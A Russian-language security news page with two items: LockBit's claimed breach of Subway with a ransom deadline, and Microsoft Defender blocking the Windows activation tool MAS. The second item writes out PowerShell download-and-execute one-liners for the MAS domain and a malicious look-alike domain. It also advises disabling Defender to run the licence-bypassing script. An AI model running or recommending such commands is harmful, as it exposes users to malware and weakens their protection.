Операторы Lockbit утверждают, что взломали фастфудную сеть Subway

Операторы Lockbit утверждают, что взломали фастфудную сеть Subway

Операторы Lockbit утверждают, что взломали фастфудную сеть Subway

Сеть американских заведений быстрого питания Subway стала жертвой операторов программы-вымогателя LockBit. По крайней мере, об этом заявили сами киберпреступники.

На днях злоумышленники добавили Subway в список жертв на своём сайте в сети Tor. Дедлайн оплаты выкупа — 02 февраля 2023 года.

По словам операторов шифровальщика, они утащили сотни гигабайт конфиденциальных данных, включая информацию о доходе сотрудников, оборотах ресторанов, выплатах за франшизу и пр.

«Крупнейшая сеть сэндвичей ведёт себя так, будто ничего не произошло. А мы, между прочим, вытащили их внутреннюю систему SUBS, включающую сотни гигабайт внутренних данных», — пишут киберпреступники.

«Даём им немного времени обдумать ситуацию и заплатить выкуп, в противном случае продадим всю информацию нашим коллегам».

 

Точная сумма выкупа пока неизвестна.

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru